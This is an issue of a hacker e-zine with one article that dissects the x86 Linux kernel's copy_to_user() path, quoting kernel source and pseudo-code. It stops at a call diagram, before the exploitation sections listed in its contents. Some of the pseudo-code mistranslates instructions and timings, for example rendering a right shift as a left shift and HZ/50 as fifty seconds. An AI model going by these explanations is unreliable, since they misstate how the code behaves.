Copy Link
Add to Bookmark
Report

Aware eZine 04 - Delta

eZine's profile picture
Published in 
aware eZine
 · 4 years ago


  
?010000+
#01011011100110010000#
10000001~ =11001101
101111 001000
0001# 10100
1011 1010
0001 O000 0001 1010
0101 ?110011 001000# 000D
110 100001100 001011100 100
110 010000100000 011101000110 100
~001 10000101110100 00100000010010 010
,01D 0000001101101011 1010101110011011 101
00D 001000000110101101 O10100101101100011 011
000 0100000011010010111$ 0100001000000110100 101
101 110001000000110100101 110100011100110010000 001
11 I0011011011000110010101 10010101110000001000000,11
000 010110111001100100001000 000111011101101001011101 000
11 O0100000100000011011010111 10010010000001100001011100 10
011 011010111001100100000011/ :100100110000101101001011 10O
011 01100101011001000010000 ~001110/ 10001101111001000000111 010
00~:1101000011001010010000 0011010000 11001010110000101110110Z01
10 01010110111001110011001 000000110100 10111010000100000011010 01
01 1100110010000001110111D 011010010111 :0100011010000010000001 11
01 000110100001 10
01 010010000001 11
00I 1101110100 011
100 100110 010
#10 11I
01 1+ ,1 +00
110 011101110100 011
01, 00000100000011 /01
111 0110011000100000 011
011 010110000101101110 011
110 I0100100000011101000 110
100 ~00110000101110100001O 000
000 ,1001001001000000110010+ 001
110 010011010010111011001100 101
001O 00000011101000110100001101 0010
=111 0011001000000110010001100001 011,
0011 101100111011001010111001000100 0000
1110, 10001101000011100100110111101110 =1010
11001 I110110100000100000011010Z 01011
?10100I 0111001100100000, Z01100:
:01001101/ $11101100,
1000111100100101110


.AWARE eZINE DELTA : WELCOME TO THE DIGITAL HOLOCAUST

As you may know or not know, the eZine Delta never got released because only
two articles were handed in. I decided to publish these two articles in this
file, because why the hell not.
rattle out.


[==============================================================================]
[--------------------[ copy_to_user and Information Leaks ]--------------------]
[==============================================================================]

_.d####b._
.############.
.################.
.##################.__ __ __ __ _ _ __ __
##############/ _`|#\ V V // _` | '_/ -_)
##############\__,|# \_/\_/ \__,_|_| \___|
###########>"<######
*#########( )####*
##########>.<##### By: tping
################
*############*
"
T######T"


-----------------------------------------------------
[Table of Contents]

1 Introduction
1.1 Intro to copy_to_user
1.2 Meeting access_ok macro
1.3 __copy_to_user Analysis and Exception Handling
1.4 __copy_to_user_ll Function
2 copt_to_user on non-WP processors
2.1 __copy_user Analysis
2.2 __copy_to_user_intel Analysis
3 copy_to_user Diagram
4 Kernel Information Leaks
4.1 Exploitation
4.2 CVE-2008-3792: SCTP-AUTH API
5 Fixing the bug
6 Conclusion
7 References

-----------------------------------------------------



1] Introduction

This article was written to provide knowledge on a popular Linux kernel
API's routine's internals after the suggestion of dexter (thanks man) for
doing so about two years ago.
Throughout this document various code snippets are being presented and
analysed, all of them can be found in Linux kernel 2.6.29 release (the
latest by the time of this writing). The main aim of this work is to
provide an extensive review of the copy_to_user()'s internals. Hopefully,
in such depth that no previous knowledge of kernel programming for the
Linux kernel will be required by the reader. The only requirements for
getting something out of this work is knowledge of C programming, a little
bit of IA-32 assembly since this article focuses specifically on x86
architecture and of course, spare time.
At the end there will be a section dedicated to public vulnerabilities
found in kernel code that uses this routine and how those can be abused.
So, lay back, relax... and enjoy the journey.


1.1] Intro to copy_to_user

copy_to_user (as it is implied by its name) is a kernel API function for
copying data from kernel memory into user space memory. Its prototype is
this:

------------------------------------------------------------------[snip]--------

unsigned long copy_to_user(void __user * to,
const void * from,
unsigned long n);

------------------------------------------------------------------[snip]--------

Where these arguments represent the following elements:

- to
Pointer to the destination in user space.

- from
Pointer to the source address in kernel space.

- n
Number of bytes to copy.

Qualifier __user which is being used at the user space pointer, is a C
macro located at include/linux/compiler.h which looks like this:

------------------------------------------------------------------[snip]--------

#ifdef __CHECKER__
# define __user __attribute__((noderef, address_space(1)))
...
#else
# define __user

------------------------------------------------------------------[snip]--------

This ensures that user space pointer has an address that belongs to the
user space range. However, this is applied only when this code is compiled
with __CHECKER__ directive set. This happens only when sparse (Semantic C
Parser) is being used.
Back to our function, the value returned is zero on success or the number
of bytes that could not be copied in any other case. Since this article's
focus is on x86 architecture, the function analysed here can be found at
arch/x86/usercopy_32.c file.

------------------------------------------------------------------[snip]--------

unsigned long
852 copy_to_user(void __user *to, const void *from, unsigned long n)
853 {
854 if (access_ok(VERIFY_WRITE, to, n))
855 n = __copy_to_user(to, from, n);
856 return n;
857 }
858 EXPORT_SYMBOL(copy_to_user);

------------------------------------------------------------------[snip]--------

Obviously, this is a wrapper around __copy_to_user() function which is
discussed in depth in section "
__copy_to_user Analysis" later in this
document. The above code performs a check using access_ok() macro at line
854 passing the destination pointer and the requested bytes as arguments
to access_ok before invoking the actual routine.
Finally, it exports copy_to_user symbol in order to be accessible to the
rest of the kernel routines.


1.2] Meeting access_ok macro

This is a commonly used C macro in Linux kernel code. In almost any read
or write operation from or to user space this macro is employed to check
the validity of the given pointer. This macro is defined at the
arch/x86/include/asm/uaccess.h header file like this:

------------------------------------------------------------------[snip]--------

#define access_ok(type, addr, size) (likely(__range_not_ok(addr, size) == 0))

------------------------------------------------------------------[snip]--------

It takes three arguments which represent:

- type
The type of access which can be either VERIFY_READ or VERIFY_WRITE.

- addr
Pointer to user space which indicates the start of the block to check.

- size
The size of block to check.

The two availabe types are also defined in the same header file.

------------------------------------------------------------------[snip]--------

#define VERIFY_READ 0
#define VERIFY_WRITE 1

------------------------------------------------------------------[snip]--------

The body of access_ok uses another macro, likely() which can be seen at
include/linux/compiler.h. This performs branch prediction for efficiency
purposes. The proceeding call to __range_not_ok() reveals that the type
parameter is completely ignored (at least on x86 processors) which makes
it one less thing to worry about. The code of the latter macro is this:

------------------------------------------------------------------[snip]--------

50 #define __range_not_ok(addr, size) \
51 ({ \
52 unsigned long flag, roksum; \
53 __chk_user_ptr(addr); \
54 asm("
add %3,%1 ; sbb %0,%0 ; cmp %1,%4 ; sbb $0,%0" \
55 : "
=&r" (flag), "=r" (roksum) \
56 : "
1" (addr), "g" ((long)(size)), \
57 "
rm" (current_thread_info()->addr_limit.seg)); \
58 flag; \
59 })

------------------------------------------------------------------[snip]--------

It is a straightforward inline assembly operation which can be splited up
to the following pseudo-code provided by the Linux kernel developers:

(u33)addr + (u33)size >= (u33)current_thread_info()->addr_limit.seg

Macro invoked at line 53 is also used by sparse (Semantic PARSEr for C),
it only affects this parsing process in checking the arguments' data types
Specifically, this macro of include/linux/compiler.h does the following.

------------------------------------------------------------------[snip]--------

6 #ifdef __CHECKER__
...
18 extern void __chk_user_ptr(const volatile void __user *);
...
20 #else
...
27 # define __chk_user_ptr(x) (void)0

------------------------------------------------------------------[snip]--------

Meaning that if __CHECKER__ is enabled, it will check the argument type to
be that of the one defined at line 18, else it will just do nothing.

To conclude, access_ok on x86 checks only that the given pointer is in the
boundaries of the calling thread's segment limit. Also, it returns a non
zero value (true) if pointer+size is valid, otherwise it returns a zero
value (false).


1.3] __copy_to_user Analysis and Exception Handling

This is the function being internally invoked when copy_to_user() calls
are made. It is important to note that this function may sleep, meaning
that it could sleep (aka wait) until its lock(s) is/are available to it.
The code of this static function is at arch/x86/include/asm/uaccess_32.h
header file.

------------------------------------------------------------------[snip]--------

82 static __always_inline unsigned long __must_check
83 __copy_to_user(void __user *to, const void *from, unsigned long n)
84 {
85 might_fault();
86 return __copy_to_user_inatomic(to, from, n);
87 }

------------------------------------------------------------------[snip]--------

Where the two qualifiers in the function's scope are:

- __always_inline
A GCC's attribute for enforcing the machine code of this function being
used wherever it is being invoked instead of calling it using common
function calling conventions.

- __must_check
Another GCC's attribute that generates a warning if the return value of
the function is not being used.

Because of the nature of this routine, might_fault() is invoked at line 85
to handle any waiting for locks scenarions. Next, at line 86 a call
to __copy_to_user_inatomic() is being made. This function can be found at
arch/x86/include/asm/uaccess_32.h for x86 architecture.

------------------------------------------------------------------[snip]--------

44 static __always_inline unsigned long __must_check
45 __copy_to_user_inatomic(void __user *to, const void *from, unsigned long n)
46 {
47 if (__builtin_constant_p(n)) {
48 unsigned long ret;
49
50 switch (n) {
51 case 1:
52 __put_user_size(*(u8 *)from, (u8 __user *)to,
53 1, ret, 1);
54 return ret;
55 case 2:
56 __put_user_size(*(u16 *)from, (u16 __user *)to,
57 2, ret, 2);
58 return ret;
59 case 4:
60 __put_user_size(*(u32 *)from, (u32 __user *)to,
61 4, ret, 4);
62 return ret;
63 }
64 }
65 return __copy_to_user_ll(to, from, n);
66 }

------------------------------------------------------------------[snip]--------

The above code might enter the if statement at line 47 if the GCC's
built-in function __builtin_constant_p() returns a non-zero value. This
can happen if 'n' has constant value and this will allow GCC perform
constant-folding on expressions. This however, will affect only 1, 2 and 4
bytes requests. If this is the case, then __put_user_size() macro will be
invoked. Its code is part of arch/x86/include/asm/uaccess.h.

------------------------------------------------------------------[snip]--------

267 #define __put_user_size(x, ptr, size, retval, errret) \
268 do { \
269 retval = 0; \
270 __chk_user_ptr(ptr); \
271 switch (size) { \
272 case 1: \
273 __put_user_asm(x, ptr, retval, "
b", "b", "iq", errret); \
274 break; \
275 case 2: \
276 __put_user_asm(x, ptr, retval, "
w", "w", "ir", errret); \
277 break; \
278 case 4: \
279 __put_user_asm(x, ptr, retval, "
l", "k", "ir", errret);\
280 break; \
281 case 8: \
282 __put_user_u64((__typeof__(*ptr))(x), ptr, retval); \
283 break; \
284 default: \
285 __put_user_bad(); \
286 } \
287 } while (0)

------------------------------------------------------------------[snip]--------

The user pointer (ptr) is passed into __chk_user_ptr() which was discussed
earlier in this document, and a switch statement for size of 1, 2, 4, and
8 follows up. Macro __put_user_asm() which belongs to the same header file
is this:

------------------------------------------------------------------[snip]--------

378 #define __put_user_asm(x, addr, err, itype, rtype, ltype, errret) \
379 asm volatile("
1: mov"itype" %"rtype"1,%2\n" \
380 "
2:\n" \
381 "
.section .fixup,\"ax\"\n" \
382 "
3: mov %3,%0\n" \
383 "
jmp 2b\n" \
384 "
.previous\n" \
385 _ASM_EXTABLE(1b, 3b) \
386 : "
=r"(err) \
387 : ltype(x), "
m" (__m(addr)), "i" (errret), "0" (err))

------------------------------------------------------------------[snip]--------

Damn you GCC! This is one of the most ugly codes I've ever seen. Anyway,
considering the case of a single byte call to copy_to_user() the above
macro would generate assembly code similar to this pseudo-code:

1: movb *(struct __large_struct __user *)user_ptr, errret
2:
.section .fixup, "
ax"
3: mov errret, kernel_ptr
jmp 2b
.previous
.section __ex_table,"
a"
.align 4
.long 1b, 3b
.previous

Before explaining what this does, here is why it is translated like this.

------------------------------------------------------------------[snip]--------

369 /* FIXME: this hack is definitely wrong -AK */
370 struct __large_struct { unsigned long buf[100]; };
371 #define __m(x) (*(struct __large_struct __user *)(x))

------------------------------------------------------------------[snip]--------

And _ASM_EXTABLE() is located at arch/x86/include/asm/asm.h and is quite
straightforward in comparison to macros like the previously discussed one.

------------------------------------------------------------------[snip]--------

40 /* Exception table entry */
41 # define _ASM_EXTABLE(from,to) \
42 __ASM_EX_SEC \
43 _ASM_ALIGN "
\n" \
44 _ASM_PTR #from "
," #to "\n" \
45 "
.previous\n"

------------------------------------------------------------------[snip]--------

The macros used internally in _ASM_EXTABLE() are the following.

------------------------------------------------------------------[snip]--------

8 # define __ASM_FORM(x) "
" #x " "
9 # define __ASM_EX_SEC "
.section __ex_table,\"a\"\n"
...
13 # define __ASM_SEL(a,b) __ASM_FORM(a)
...
21 #define _ASM_PTR __ASM_SEL(.long, .quad)
22 #define _ASM_ALIGN __ASM_SEL(.balign 4, .balign 8)

------------------------------------------------------------------[snip]--------

The pseudo-code demonstrated earlier copies one single byte and then a
"
new" ELF section named .fixup rises up. Now, this section contains this
code from the above example:

mov errret, kernel_ptr
jmp 2b

And the other new section, __ex_table has this code:

.long 1b, 3b

Those represent the local (backward) labels. Label 1 has the critical code
that could easily fail. It's the actual copy operation and label 3 is the
exception handling code. This means that the exception handling goes like
this in an erroneous situation.

Access to invalid address:

1) MMU generates exception
2) CPU calls do_page_fault
3) do_page_fault calls search_exception_table
4) search_exception_table looks up the address in the exception table
(i.e. the contents of the ELF section __ex_table and returns the address
of the associated fault handle code).
5) do_page_fault modifies its own return address to point to the fault
handle code and returns.
6) execution continues in the fault handling code.

This is almost exactly the same as on [1]. Although, if
__copy_to_user_inatomic() does not fall into one of those four cases (copy
of 1, 2, 4 or 8 bytes) it will immediately invoke __copy_to_user_ll().
Because of its complexity this will be discussed seperately in the next
section.


1.4] __copy_to_user_ll Function

This function will be discussed in segments. The first condition being
checked is the following.

------------------------------------------------------------------[snip]--------

717 unsigned long __copy_to_user_ll(void __user *to, const void *from,
718 unsigned long n)
719 {
720 #ifndef CONFIG_X86_WP_WORKS_OK
721 if (unlikely(boot_cpu_data.wp_works_ok == 0) &&
722 ((unsigned long)to) < TASK_SIZE) {

------------------------------------------------------------------[snip]--------

This option is enabled in the default kernel and by doing so, the kernel
will assume that processor can successfully write to pages while in
supervisor mode. The if clause at line 721 uses a CPU capability declared
in arch/x86/include/asm/processor.h header file like this:

extern struct cpuinfo_x86 boot_cpu_data;

This structure is part of the same header file and includes CPU specific
type and hardware flags. Those are referenced directly in head.S. The
member used at line 721 is this:

------------------------------------------------------------------[snip]--------

58 struct cpuinfo_x86 {
59 __u8 x86; /* CPU family */
...
63 #ifdef CONFIG_X86_32
64 char wp_works_ok; /* It doesn't on 386's */
...
114 } __attribute__((__aligned__(SMP_CACHE_BYTES)));

------------------------------------------------------------------[snip]--------

Using this member, __copy_to_user_ll() checks that the writing to pages
(wp) capability works and the destination pointer (to) isn't greater than
TASK_SIZE which is also part of arch/x86/include/asm/processor.h.

------------------------------------------------------------------[snip]--------

837 #ifdef CONFIG_X86_32
838 /*
839 * User space process size: 3GB (default).
840 */
841 #define TASK_SIZE PAGE_OFFSET

------------------------------------------------------------------[snip]--------

Even though it's explicity stated in the comment. The reason that TASK_SIZE
is 3GB is that PAGE_OFFSET from arch/x86/include/asm/page.h is:

#define PAGE_OFFSET ((unsigned long)__PAGE_OFFSET)

Which can be found at arch/x86/include/asm/page_32.h like this:

#define __PAGE_OFFSET _AC(CONFIG_PAGE_OFFSET, UL)

Where _AC() from include/linux/const.h is simply:

#define _AC(X,Y) X

And at last, CONFIG_PAGE_OFFSET is defined at the kernel's configuration
file and by default on 32-bit x86 processors is 0xc0000000. This value in
decimal is 3221225472. This is why it is 3GB. Assuming that the processor
doesn't have writing capability to pages on supervisor mode (WP=0) support
and destination buffer is no more than 3GB long, this is what will follow
up.

------------------------------------------------------------------[snip]--------

723 /*
724 * When we are in an atomic section (see
725 * mm/filemap.c:file_read_actor), return the full
726 * length to take the slow path.
727 */
728 if (in_atomic())
729 return n;

------------------------------------------------------------------[snip]--------

This is a macro from include/linux/hardirq.h that detects if the caller
runs in an atomic context. However, this macro cannot always detect locks
and in particular, spin-locks in non-preemptible kernels [3].
This is how it is defined.

#define in_atomic() ((preempt_count() & ~PREEMPT_ACTIVE) != PREEMPT_INATOMIC_BASE)

Where preemt_count() is macro at include/linux/preempt.h that retrieves
the preemt_count member of the calling thread from the cache as you can
see here.

#define preempt_count() (current_thread_info()->preempt_count)

This is part of the low level structure thread_info, located at
arch/x86/include/asm/thread_info.h and used by entry.S for immediate
access. The important for the above call member is shown here.

------------------------------------------------------------------[snip]--------

26 struct thread_info {
27 struct task_struct *task; /* main task structure */
...
32 int preempt_count; /* 0 => preemptable,
33 <0 => BUG */
...
43 };

------------------------------------------------------------------[snip]--------

And the other two constant values in in_atomic() macro are

#define PREEMPT_ACTIVE 0x10000000

And

------------------------------------------------------------------[snip]--------

#if defined(CONFIG_PREEMPT)
# define PREEMPT_INATOMIC_BASE kernel_locked()
...
#else
# define PREEMPT_INATOMIC_BASE 0

------------------------------------------------------------------[snip]--------

kernel_locked() is a dummy check of the locks' counter located at include/
linux/smp_lock.h.

#define kernel_locked() (current->lock_depth >= 0)

After passing this locks' check __copy_to_user_ll() enters a loop which
does manually the copy operation. It keeps iterating as long as number of
bytes 'n' has not reached zero.

------------------------------------------------------------------[snip]--------

731 /*
732 * CPU does not honor the WP bit when writing
733 * from supervisory mode, and due to preemption or SMP,
734 * the page tables can change at any time.
735 * Do it manually. Manfred <manfred@colorfullife.com>
736 */
737 while (n) {
738 unsigned long offset = ((unsigned long)to)%PAGE_SIZE;
739 unsigned long len = PAGE_SIZE - offset;
740 int retval;
741 struct page *pg;
742 void *maddr;
743
744 if (len > n)
745 len = n;

------------------------------------------------------------------[snip]--------

Variables offset and len are initialized to store the offset to the user
space destination pointer and its size. A pointer to a page structure at
line 741 follows. This structure is defined at include/linux/mm_types.h
and used to keep track of each physical page of the system. Next, if the
calculated length is greater than the requested number of bytes 'n', it
updates 'len' to be equal to this value. The function continues like this

------------------------------------------------------------------[snip]--------

746
747 survive:
748 down_read(&current->mm->mmap_sem);
749 retval = get_user_pages(current, current->mm,
750 (unsigned long)to, 1, 1, 0, &pg, NULL);

------------------------------------------------------------------[snip]--------

The call to down_read() of kernel/rwsem.c simply locks this memory with a
semaphore. The subsequent call to get_user_pages() retrives the page(s) of
the 'current' process and stores it into 'pg' page. Since this is a memory
management routine that requires an article by itself, it won't be
discussed any further. Nevertheless, you can find it at at mm/memory.c and
start studying it from there. The next code in __copy_to_user_ll() is this.

------------------------------------------------------------------[snip]--------

751
752 if (retval == -ENOMEM && is_global_init(current)) {
753 up_read(&current->mm->mmap_sem);
754 congestion_wait(WRITE, HZ/50);
755 goto survive;
756 }
757

------------------------------------------------------------------[snip]--------

If the previous call to get_user_pages() returned that there is no memory
(-ENOMEM) and if the current process is the INIT process which is checked
using the include/linux/sched.h's function is_global_init.

------------------------------------------------------------------[snip]--------

1573 static inline int is_global_init(struct task_struct *tsk)
1574 {
1575 return tsk->pid == 1;
1576 }

------------------------------------------------------------------[snip]--------

Then, unlock the semaphore (line 753) and wait for up to 50 seconds to
become uncongested using congestion_wait() function from mm/backing-dev.c
At last, go back to the 'survive' label and continue the execution. This
is done in order to retry reading the page(s) required for the copying
process to proceed. The following check is this:

------------------------------------------------------------------[snip]--------

758 if (retval != 1) {
759 up_read(&current->mm->mmap_sem);
760 break;
761 }
762

------------------------------------------------------------------[snip]--------

It checks whether get_user_pages() returned a value not equal to one which
could happen in numerous situations, including a requested length having a
negative value. If this evaluates to true, it will release the semaphore
and immediately break. If this isn't the case, this is what follows up.

------------------------------------------------------------------[snip]--------

763 maddr = kmap_atomic(pg, KM_USER0);
764 memcpy(maddr + offset, from, len);
765 kunmap_atomic(maddr, KM_USER0);

------------------------------------------------------------------[snip]--------

This is a simple sequence of map, copy and unmap operation. Function at
line 763 is just a wrapper around kmap_atomic_prot() which is located at
the arch/x86/mm/highmem_32.c memory management source code file:

------------------------------------------------------------------[snip]--------

94 void *kmap_atomic(struct page *page, enum km_type type)
95 {
96 return kmap_atomic_prot(page, type, kmap_prot);
97 }

------------------------------------------------------------------[snip]--------

This atomic kmap function is faster than kmap() because it doesn't make
use of a global lock. After getting the requested mapping, a call to
memcpy() is made to copy the kernel data from 'from' pointer to the page
at the offset calculated previously at line 738. Finally ,the while loop
does this:

------------------------------------------------------------------[snip]--------

766 set_page_dirty_lock(pg);
767 put_page(pg);
768 up_read(&current->mm->mmap_sem);
769
770 from += len;
771 to += len;
772 n -= len;
773 }
774 return n;
775 }
776 #endif

------------------------------------------------------------------[snip]--------

The call at line 767 is from a function found at mm/page-writeback.c and
used to mark this page as dirty. Then the page is being put in the cache
using put_page() from mm/swap.c and finally, up_read() is used to release
the semaphore from the thread.
Source and destination pointers are updated to point after the bytes being
copied and 'n' is decremented by the number of copied bytes. If this was a
successful copy, then probably 'n' would be zero and this while loop will
terminate.
However, if the processor does have enabled the CONFIG_X86_WP_WORKS_OK
option, it will fall into the following part of __copy_to_user_ll():

------------------------------------------------------------------[snip]--------

777 if (movsl_is_ok(to, from, n))
778 __copy_user(to, from, n);
779 else
780 n = __copy_user_intel(to, from, n);
781 return n;
782 }
783 EXPORT_SYMBOL(__copy_to_user_ll);

------------------------------------------------------------------[snip]--------

The arguments are passed through a macro of arch/x86/lib/usercopy_32.c.
This is used as an alternative copy when WP is supported by the processor.

------------------------------------------------------------------[snip]--------

24 static inline int __movsl_is_ok(unsigned long a1, unsigned long a2, unsigned long n)
25 {
26 #ifdef CONFIG_X86_INTEL_USERCOPY
27 if (n >= 64 && ((a1 ^ a2) & movsl_mask.mask))
28 return 0;
29 #endif
30 return 1;
31 }
32 #define movsl_is_ok(a1, a2, n) \
33 __movsl_is_ok((unsigned long)(a1), (unsigned long)(a2), (n))

------------------------------------------------------------------[snip]--------

If CONFIG_X86_INTEL_USERCOPY is disabled it will always return 1 but in
any other case, it will check whether the number of bytes to be copied is
greater than, or equal to 64 and user space and kernel space pointers
should contain movsl_mask.mask flag. This movls_mask structure is defined
at arch/x86/include/asm/uaccess.h like that.

------------------------------------------------------------------[snip]--------

437 /*
438 * movsl can be slow when source and dest are not both 8-byte aligned
439 */
440 #ifdef CONFIG_X86_INTEL_USERCOPY
441 extern struct movsl_mask {
442 int mask;
443 } ____cacheline_aligned_in_smp movsl_mask;
444 #endif

------------------------------------------------------------------[snip]--------

If this expression returns a non-zero value, then movsl_is_ok() will
return zero and it will execute the function at line 780 on its else clause.
Otherwise, it will invoke __copy_user(). Both of these functions are
described in detail next in separate sections.


2.1] __copy_user Analysis

This is another C macro found at arch/x86/lib/usercopy_32.c. It is written
entirely in assembler as a generic copy routine.

------------------------------------------------------------------[snip]--------

639#define __copy_user(to, from, size) \
640do { \
641 int __d0, __d1, __d2; \
642 __asm__ __volatile__( \
643 "
cmp $7,%0\n" \
644 "
jbe 1f\n" \
645 "
movl %1,%0\n" \
646 "
negl %0\n" \
647 "
andl $7,%0\n" \
648 "
subl %0,%3\n" \
649 "
4: rep; movsb\n" \
650 "
movl %3,%0\n" \
651 "
shrl $2,%0\n" \
652 "
andl $3,%3\n" \
653 "
.align 2,0x90\n" \
654 "
0: rep; movsl\n" \
655 "
movl %3,%0\n" \
656 "
1: rep; movsb\n" \
657 "
2:\n" \
658 "
.section .fixup,\"ax\"\n" \
659 "
5: addl %3,%0\n" \
660 "
jmp 2b\n" \
661 "
3: lea 0(%3,%0,4),%0\n" \
662 "
jmp 2b\n" \
663 "
.previous\n" \
664 "
.section __ex_table,\"a\"\n" \
665 "
.align 4\n" \
666 "
.long 4b,5b\n" \
667 "
.long 0b,3b\n" \
668 "
.long 1b,2b\n" \
669 "
.previous" \
670 : "
=&c"(size), "=&D" (__d0), "=&S" (__d1), "=r"(__d2) \
671 : "
3"(size), "0"(size), "1"(to), "2"(from) \
672 : "
memory"); \
673} while (0)

------------------------------------------------------------------[snip]--------

Again, it is the same concept. Exception handler associates the critical
instructions with the appropriate code like this:

Code Label Exception Label
--------------------------------------
4 5
0 3
1 2

The rest of the code is a common copy routine written in assembler. Here
is an overview of the code.

compare from with size
jbe 1f
move __d0, size
neg size
from & size
size - __d2
4:
repeat
move byte string
move __d2 to size
shift __d1 left by size
__d2 & __d2
.align 2, 0x90
0:
repeat
move long string
move __d2 to size
1:
repeat
move byte string
2:
.section .fixup, "
ax"
5:
__d2 & size
jump 2b
3:
load 0(__d2, size, 4) into size
jump 2b
.previous
.section __ex_table, "
a"
.align 4
.long 4b, 5b
.long 0b, 3b
.long 1b, 2b
.previous

Which represents a common copy routine written in assembly. The above
pseudo-code is not 100% accurate but it is an abstract representation of
the original inline assembly code.


2.2] __copy_user_intel() Analysis

This routine is invoked by __copy_to_user_ll() function at line 780 at the
else clause. This is also written at pure assembly and can be found at
arch/x86/lib/usercopy_32.c like this:

------------------------------------------------------------------[snip]--------

228#ifdef CONFIG_X86_INTEL_USERCOPY
229static unsigned long
230__copy_user_intel(void __user *to, const void *from, unsigned long size)
231{
232 int d0, d1;
233 __asm__ __volatile__(
234 "
.align 2,0x90\n"
235 "
1: movl 32(%4), %%eax\n"
236 "
cmpl $67, %0\n"
237 "
jbe 3f\n"
238 "
2: movl 64(%4), %%eax\n"
239 "
.align 2,0x90\n"
240 "
3: movl 0(%4), %%eax\n"
241 "
4: movl 4(%4), %%edx\n"
242 "
5: movl %%eax, 0(%3)\n"
243 "
6: movl %%edx, 4(%3)\n"
244 "
7: movl 8(%4), %%eax\n"
245 "
8: movl 12(%4),%%edx\n"
246 "
9: movl %%eax, 8(%3)\n"
247 "
10: movl %%edx, 12(%3)\n"
248 "
11: movl 16(%4), %%eax\n"
249 "
12: movl 20(%4), %%edx\n"
250 "
13: movl %%eax, 16(%3)\n"
251 "
14: movl %%edx, 20(%3)\n"
252 "
15: movl 24(%4), %%eax\n"
253 "
16: movl 28(%4), %%edx\n"
254 "
17: movl %%eax, 24(%3)\n"
255 "
18: movl %%edx, 28(%3)\n"
256 "
19: movl 32(%4), %%eax\n"
257 "
20: movl 36(%4), %%edx\n"
258 "
21: movl %%eax, 32(%3)\n"
259 "
22: movl %%edx, 36(%3)\n"
260 "
23: movl 40(%4), %%eax\n"
261 "
24: movl 44(%4), %%edx\n"
262 "
25: movl %%eax, 40(%3)\n"
263 "
26: movl %%edx, 44(%3)\n"
264 "
27: movl 48(%4), %%eax\n"
265 "
28: movl 52(%4), %%edx\n"
266 "
29: movl %%eax, 48(%3)\n"
267 "
30: movl %%edx, 52(%3)\n"
268 "
31: movl 56(%4), %%eax\n"
269 "
32: movl 60(%4), %%edx\n"
270 "
33: movl %%eax, 56(%3)\n"
271 "
34: movl %%edx, 60(%3)\n"
272 "
addl $-64, %0\n"
273 "
addl $64, %4\n"
274 "
addl $64, %3\n"
275 "
cmpl $63, %0\n"
276 "
ja 1b\n"
277 "
35: movl %0, %%eax\n"
278 "
shrl $2, %0\n"
279 "
andl $3, %%eax\n"
280 "
cld\n"
281 "
99: rep; movsl\n"
282 "
36: movl %%eax, %0\n"
283 "
37: rep; movsb\n"
284 "
100:\n"
285 "
.section .fixup,\"ax\"\n"
286 "
101: lea 0(%%eax,%0,4),%0\n"
287 "
jmp 100b\n"
288 "
.previous\n"
289 "
.section __ex_table,\"a\"\n"
290 "
.align 4\n"
291 "
.long 1b,100b\n"
292 "
.long 2b,100b\n"
293 "
.long 3b,100b\n"
294 "
.long 4b,100b\n"
295 "
.long 5b,100b\n"
296 "
.long 6b,100b\n"
297 "
.long 7b,100b\n"
298 "
.long 8b,100b\n"
299 "
.long 9b,100b\n"
300 "
.long 10b,100b\n"
301 "
.long 11b,100b\n"
302 "
.long 12b,100b\n"
303 "
.long 13b,100b\n"
304 "
.long 14b,100b\n"
305 "
.long 15b,100b\n"
306 "
.long 16b,100b\n"
307 "
.long 17b,100b\n"
308 "
.long 18b,100b\n"
309 "
.long 19b,100b\n"
310 "
.long 20b,100b\n"
311 "
.long 21b,100b\n"
312 "
.long 22b,100b\n"
313 "
.long 23b,100b\n"
314 "
.long 24b,100b\n"
315 "
.long 25b,100b\n"
316 "
.long 26b,100b\n"
317 "
.long 27b,100b\n"
318 "
.long 28b,100b\n"
319 "
.long 29b,100b\n"
320 "
.long 30b,100b\n"
321 "
.long 31b,100b\n"
322 "
.long 32b,100b\n"
323 "
.long 33b,100b\n"
324 "
.long 34b,100b\n"
325 "
.long 35b,100b\n"
326 "
.long 36b,100b\n"
327 "
.long 37b,100b\n"
328 "
.long 99b,101b\n"
329 "
.previous"
330 : "
=&c"(size), "=&D" (d0), "=&S" (d1)
331 : "
1"(to), "2"(from), "0"(size)
332 : "
eax", "edx", "memory");
333 return size;
334}
335

------------------------------------------------------------------[snip]--------

Here is an equivalent pseudo-code for the above assembly routine:

.align 2, 0x90
1:
move 32(from) to %eax
compare 67 with size
jbe 3f
2:
move 64(from) to %eax
.align 2, 0x90
3:
move 0(from) to %eax
4:
move 4(from) to %edx
5:
move %eax to 0(to)
6:
move %edx to 4(to)
7:
move 8(from) to %eax
8:
move 12(from) to %edx
9:
move %eax to 8(to)
10:
move %edx to 12(to)
11:
move 16(from) to %eax
12:
move 20(from) to %edx
13:
move %eax to 16(to)
14:
move %edx to 20(to)
15:
move 24(from) to %eax
16:
move 28(from) to %edx
17:
move %eax to 24(to)
18:
move %edx to 28(to)
19:
move 32(from) to %eax
20:
move 36(from) to %edx
21:
move %eax to 32(to)
22:
move %edx to 36(to)
23:
move 40(from) to %eax
24:
move 44(from) to %edx
25:
move %eax to 40(to)
26:
move %edx to 44(to)
27:
move 48(from) to %eax
28:
move 52(from) to %edx
29:
move %eax to 48(to)
30:
move %edx to 52(to)
31:
move 56(from) to %eax
32:
move 60(from) to %edx
33:
move %eax to 56(to)
34:
move %edx to 60(to)
size & -64
from & 64
to & 64
compare 63 with size
ja 1b
35:
move size to %eax
shift size left by 2
%eax & 3
cld
repeat
99:
move long string
36:
move %eax to size
37:
repeat
move byte string
100:
.section .fixup "
ax"
101:
load 0(%eax, size, 4) into size
jump 100b
.previous
.section __ex_table, "
a"
.align 4
.long 1b, 100b
.long 2b, 100b
.long 3b, 100b
.long 4b, 100b
.long 6b, 100b
.long 7b, 100b
.long 8b, 100b
.long 9b, 100b
.long 10b, 100b
.long 11b, 100b
.long 12b, 100b
.long 13b, 100b
.long 14b, 100b
.long 15b, 100b
.long 16b, 100b
.long 17b, 100b
.long 18b, 100b
.long 19b, 100b
.long 20b, 100b
.long 21b, 100b
.long 22b, 100b
.long 23b, 100b
.long 24b, 100b
.long 25b, 100b
.long 26b, 100b
.long 27b, 100b
.long 28b, 100b
.long 29b, 100b
.long 30b, 100b
.long 31b, 100b
.long 32b, 100b
.long 33b, 100b
.long 34b, 100b
.long 35b, 100b
.long 36b, 100b
.long 37b, 100b
.long 99b, 101b
.previous


3] copy_to_user Diagram

I found it quite useful to have a diagram of the functions being invoked
for future reference and for this reason I decided to included in this
article. So, here is an abstract representation of the copy_to_user
routine.

copy_to_user
|
+--> access_ok
|
+--> __copy_to_user
|
+--> might_fault
|
+--> __copy_to_user_inatomic
|
+--> __put_user_size
|
+--> __copy_to_user_ll
|
+--> in_atomic
|
